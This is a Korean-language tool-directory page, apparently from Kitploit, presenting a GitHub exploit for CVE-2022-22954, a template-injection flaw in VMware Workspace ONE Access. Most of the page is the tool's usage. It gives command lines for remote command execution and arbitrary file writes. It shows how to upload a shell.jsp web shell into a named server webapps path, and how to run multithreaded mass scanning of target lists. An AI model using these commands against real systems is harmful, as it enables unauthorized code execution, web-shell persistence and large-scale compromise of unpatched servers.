Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/bewhale/cve-2022-22954
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubbewhale/cve-2022-22954

CVE-2022-22954

CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 취약점 명령 실행, 일괄 탐지 스크립트, 파일 쓰기

저장소 보기
6819134년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-22954

다중 취약점 트리거 포인트 탐지, 멀티스레드 일괄 탐지, 명령 실행, 파일 쓰기

// 단일 대상 취약점 탐지
python CVE-2022-22954.py -u https://x.x.x.x

// 명령 실행
python CVE-2022-22954.py -u https://x.x.x.x -c "id"

// 파일 쓰기
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp  -fc "test"

// 파일 업로드, Windows에서 파일명 설정 시 경로 지정 필요
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp  -fp "D:\Desktop\shell.jsp"

// 지정된 경로에 업로드
python CVE-2022-22954.py -u https://x.x.x.x -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp"  -fp "D:\Desktop\shell.jsp"

// 일괄 탐지, 사용법 동일
python CVE-2022-22954.py -f url.txt
python CVE-2022-22954.py -f url.txt -c "id" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp  -fc "test" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp  -fp "D:\Desktop\shell.jsp" -t 200
python CVE-2022-22954.py -f url.txt -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp"  -fp "D:\Desktop\shell.jsp" -t 200

참고 문서

https://mp.weixin.qq.com/s/2qHhPs1HcEXVQb7bkC3mcA

도구 다운로드